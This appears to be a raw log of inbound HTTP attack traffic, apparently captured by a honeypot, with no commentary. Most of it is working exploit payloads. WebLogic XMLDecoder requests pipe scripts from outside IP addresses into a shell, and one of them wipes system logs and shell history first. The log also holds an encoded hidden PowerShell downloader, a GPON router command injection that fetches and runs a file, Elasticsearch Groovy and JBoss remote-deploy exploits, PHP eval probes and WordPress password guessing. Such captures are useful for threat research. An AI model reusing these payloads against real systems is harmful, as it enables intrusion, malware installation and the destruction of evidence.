Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 19
Cache-Control: no-cache
log=172&pwd=1722014
POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
eval=die((string)(111111111*9));
POST http://check.proxyradar.com/azenv.php?auth=149408915993&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅpÈ!3Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å
⁄SÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îìFY›∆√«∆fl
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å%ÑlhÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î¯+Y›∆√«∆fl
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Ÿ√ßÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îr\0Y›∆√«∆fl
POST http://f3.mi-stat.gslb.mi-idc.com/diagnoses/v1/report HTTP/1.1
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: f3.mi-stat.gslb.mi-idc.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 516
n=98134312514971&d=HCgAGAAYABgAABgHaHR0cGFwaRwYB2h0dHBhcGkYATAYFjQuNC40LVY3LjAuNS4wLktYRE1JQ0kYDG1vYmlsZS1IU1BBKxgPMTE0LjEyNC4yMDcuMjUyHBgG5Zu95aSWGAbljbDlsLwYABgAABocGBNhcHAuY2hhdC54aWFvbWkubmV0GTwYE2FwcC5jaGF0LnhpYW9taS5uZXQVABUCFvzJARUAGwAAGA01NC4yNTUuMTg0LjE2FQIVABYAFQAbAYUWU29ja2V0VGltZW91dEV4Y2VwdGlvbgIAGA40My4yMjQuMjQ3LjE2OBUCFQAWABUAGwGFFlNvY2tldFRpbWVvdXRFeGNlcHRpb24CAAAYD2NvbS54aWFvbWkueG1zZhgPY29tLnhpYW9taS54bXNmGBY0LjQuNC1WNy4wLjUuMC5LWERNSUNJAAA%3D&t=1494506028345&s=FDA6AF2A7BD99ECB9F41618756C237C1
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
POST http://check.proxyradar.com/azenv.php?auth=149415140129&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1673
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>unset; rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; unset HISTFILE; unset HISTSAVE; unset HISTLOG; history -n; unset WATCH; export HISTFILE=/dev/null; export HISTFILE=/dev/null; wget http://93.174.93.149/logo8.sh -O /tmp/logo8.sh; curl -o /tmp/logo8.sh http://93.174.93.149/logo8.sh; lwp-download http://93.174.93.149/logo8.sh /tmp/logo8.sh; bash /tmp/logo8.sh; rm -rf /tmp/logo8.sh; history -c</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å™≈˜[Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î´5Y›∆√«∆fl
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å«™›^Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îVJY›∆√«∆fl
POST /login.action HTTP/1.1
User-Agent: Mozilla/5.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: x.x.x.x
Content-Length: 395
Expect: 100-continue
Connection: Keep-Alive
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
axa=die('Hello, Peppa!'.(string)(111111111*9));
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 21
Cache-Control: no-cache
log=admin&pwd=!@#$%^&
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∂0B÷Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞î?1Y›∆√«∆fl
POST /web-console/Invoker HTTP/1.1
Host: x.x.x.x:8080
Accept-Encoding: identity
Content-Length: 574
Connection: keep-alive
Content-Type: application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
¨Ìsr.org.jboss.console.remote.RemoteMBeanInvocation‡O£ztÆç˙L
actionNametLjava/lang/String;[paramst[Ljava/lang/Object;[ signaturet[Ljava/lang/String;LtargetObjectNametLjavax/management/ObjectName;xptdeployur[Ljava.lang.Object;êŒXüs)lxpsr java.net.URLñ%76¸‰rIhashCodeIportL authorityq~Lfileq~Lhostq~Lprotocolq~Lrefq~xpˇˇˇˇˇˇˇˇtjoaomatosf.comt/rnp/jexws3.warq~ thttppxur[Ljava.lang.String;≠“VÁÈ{Gxpt java.net.URLsrjavax.management.ObjectNameßÎmœxpt!jboss.system:service=MainDeployerx
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /_search?pretty HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
User-Agent: Java/1.8.0_31
Content-Length: 409
Host: x.x.x.x:9200
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 424
Cache-Control: no-cache
EK0NldLKYsr+W5poEXPtZmniPo64WxzpovppRI3AjlACNprkmVfNzMiR2kfdQFdfAIPHMc20CiHHHlldIEug1evvG6S4RogtClqB0FCLka6ZVKLBgY4coWHH/eVor7Cs4Dj8anEPohpjyvCpocuoiaIaWIBPI3nmHH+Vw6KNInf1CPzO0+hZBd0Yrq2vW3DryVmWMlsvBvNkahVaFASANY23e8IPO4cgMjn+np6xiqKfYOlZfCWglL01D4Z1Y4aiCES9tMfEDIxnfLRm2CpNSlenJANJb03tMCbnfovI/vSDhGUtaSVl2TAvbJTHbPy7BDMPQGwCjDx14MUpaHgXAchAnpgK83Z7VTswrySX4Azkt8YgSsAIaCWEoNduIEXLB4IHehFUCIruXeFqySsghQxZUYQZI/35ltwDi5b+
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 23
Cache-Control: no-cache
log=admin&pwd=123456789
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 444
Cache-Control: no-cache
QqZdxd2eNgHzsIJfTdCvn9BtrEc3QgEDL+RhMgC+zcb+3BqTeaccXPoTwyRa/3a1WyU6LOQYDNBhGdP+fzkfWcSpHuuTkJ9XYF+aqTdoJi9DS88NzZ0FDRPQIsU7ktuLY6TOJp7WEcGvQ8b15+w9l7QWHX4e5/fCc2y5lOdJy9upm3eLnLfVBBSKYAGMT87TU/ZkAauqknhTmSUtvQQHqMCn0EKobd+V9P+jjyvK9leZ8kI3DPmQU3CU4j2DpFIapIPr3izEM6sBiOVpSao1mAb4b6WafmUA1ajs6evEK+p4MpVeE22IX15rKDW+AVay9ifl/XAPDwP8QjNliFymnMHg1NXXEZ39WbrPqK8VuOTFc3ZY2XV9oEbwUjDNo3p3j3dVjanKMh6wAl3QPQD9YhxCkEEztW2xZIBUtpPE36Ux8D1Bo/CGTEG4sw==
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å˙PbÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÏY›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN